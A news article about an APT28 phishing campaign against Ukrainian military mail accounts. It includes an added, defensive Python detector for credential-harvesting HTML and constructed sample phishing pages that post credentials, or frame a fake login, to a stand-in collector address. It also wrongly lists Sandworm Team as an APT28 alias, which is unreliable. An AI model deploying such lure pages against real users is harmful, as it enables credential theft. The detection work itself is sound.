A new phishing campaign targeting Ukrainian military personnel has been launched by a Russian state-sponsored hacking group.
The Ukrainian National Cyber Security Coordination Centre (NCSCC) has issued a warning to its military personnel, telling them to be cautious of the phishing campaign.
“Amidst the lack of success on the battlefield, Russia is stepping up its cyber espionage efforts and continuing to try to gain access to Ukraine‘s military situational awareness and command and control systems by stealing military personnel‘s credentials,” said the NCSCC in a statement on LinkedIn.
The threat group in question is APT28 (also known as Fancy Bear or Sandworm Team), a Russian threat group that is affiliated with the Main Directorate of the General Staff of the Russian Military (GRU).
The phishing campaign was first discovered by the NCSCC on 19 January after it noted a number of emails that sent users to a fake login page.
🚨 Russian group APT28 conducts phishing attacks against Ukrainian military personnel. #APT28 is distributing phishing HTML pages of the ukr[.]net mail service and is aimed at gaining access to the mailboxes of military personnel and units of the Ukrainian Defence Forces. pic.twitter.com/eQiWz5HGNO
— НКЦК (@ncsccUA) January 27, 2024
The NCSCC said the threat group has released a number of variants that encourage staff to reveal their credentials.
“One of the variants includes a page that imitates the military operational information as of 06.00 on 19 January 2024 regarding the Russian invasion,” the NCSCC added.
“When the page is opened, a field for entering ukr[.]net credentials is displayed to allegedly ‘confirm access’, from where the credentials will be sent to a server controlled by the group.
“In another variant, a document is distributed with allegedly detailed information about the activity of the ukr[.]net account.
“When clicking on the «Change password» button on the HTML page, a browser-in-browser attack is launched and a special iframe with a fake page for entering ukr[.]net credentials is embedded.”
The NCSCC said that in both cases, credentials are pulled to a Ubiquiti Edge router controlled by APT28, a common practice for the threat group.
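Both variants described above share two structural tells that a mail gateway or analyst can look for in an HTML attachment before anyone opens it: a password field whose form posts somewhere other than the imitated mail service, and an iframe that pulls a login page from an untrusted host (the browser-in-browser pattern). The following auditor is an added example written for this article; it is not code from the NCSCC, APT28 or any referenced tool. The trusted-host list, the sample pages and the 203.0.113.10 collector address are all constructed for illustration.

```python
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Hosts the imitated mail service legitimately uses (assumption for this example;
# a real deployment would load this allow-list from configuration).
TRUSTED_HOSTS = {"ukr.net", "mail.ukr.net", "accounts.ukr.net"}


def _host_is_trusted(url: str) -> bool:
    """True if the URL's host is a trusted host or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


class CredentialPageAuditor(HTMLParser):
    """Collects forms containing password fields, and iframes, from an HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self.iframes: List[Dict] = []
        self._open_form: Optional[Dict] = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open_form = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._open_form)
        elif tag == "input" and a.get("type", "").lower() == "password":
            if self._open_form is None:
                # A password box outside any <form> is submitted by script, not by the browser.
                self.forms.append({"action": "", "password": True, "orphan": True})
            else:
                self._open_form["password"] = True
        elif tag == "iframe":
            self.iframes.append({"src": a.get("src", ""), "srcdoc": "srcdoc" in a})

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def audit_html(html: str) -> List[str]:
    """Return human-readable findings; an empty list means no indicator was found."""
    parser = CredentialPageAuditor()
    parser.feed(html)
    parser.close()
    findings: List[str] = []
    for form in parser.forms:
        if not form["password"]:
            continue
        if form.get("orphan"):
            findings.append("password field outside any form (script-driven submission)")
        elif not form["action"]:
            findings.append("credential form without action attribute (script-driven submission)")
        elif not _host_is_trusted(form["action"]):
            host = urlparse(form["action"]).hostname or "(relative URL)"
            findings.append(f"credential form posts to untrusted host: {host}")
    for frame in parser.iframes:
        if frame["srcdoc"]:
            # Inline srcdoc lets a page render a fake login window with no external fetch.
            findings.append("iframe with inline srcdoc content (browser-in-browser pattern)")
        elif frame["src"] and not _host_is_trusted(frame["src"]):
            host = urlparse(frame["src"]).hostname or "(relative URL)"
            findings.append(f"iframe embeds content from untrusted host: {host}")
    return findings


# Constructed samples. 203.0.113.10 is a documentation-range address standing in for
# an attacker-controlled collector; it is not an indicator from the article.
SAMPLE_FAKE_LOGIN = """<html><body>
<p>Confirm access to view the document.</p>
<form method="post" action="https://203.0.113.10/post.php">
  <input type="text" name="login"><input type="password" name="password">
  <button>Confirm access</button>
</form></body></html>"""

SAMPLE_BITB = """<html><body>
<p>Account activity report</p>
<button onclick="document.getElementById('w').style.display='block'">Change password</button>
<div id="w" style="display:none"><iframe src="https://203.0.113.10/login.html"></iframe></div>
</body></html>"""

SAMPLE_BENIGN = """<html><body>
<form method="post" action="https://accounts.ukr.net/login">
  <input type="text" name="login"><input type="password" name="password">
</form></body></html>"""

if __name__ == "__main__":
    for name, doc in [("fake login", SAMPLE_FAKE_LOGIN), ("browser-in-browser", SAMPLE_BITB),
                      ("benign", SAMPLE_BENIGN)]:
        print(name, "->", audit_html(doc) or "no findings")
```

The allow-list check matches exact hosts and their subdomains only, so a look-alike such as `ukr.net.example` is still reported as untrusted. Run on attachments at the gateway, a non-empty result is a reason to quarantine the message and alert rather than a verdict on its own.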
The IT Army of Ukraine, a cyber warfare organisation created after the government called on its nation’s hackers following the Russian invasion in February 2022, has also issued a warning on its Telegram channel.
APT28 has been active for a long time now, having been established in 2004 and connected to the 95th Main Special Service Centre (GTsSS) military unit 26165, according to Cybernews citing MITRE ATT&CK.
The group is thought to have interfered in the 2016 US presidential election, including attacks on the Hillary Clinton campaign, the US Congressional Campaign Committee and the Democratic National Committee.
Five members of GRU unit 26165 were charged by the FBI in 2018 over these intrusions in the US, as well as those against the World Anti-Doping Agency and other major targets.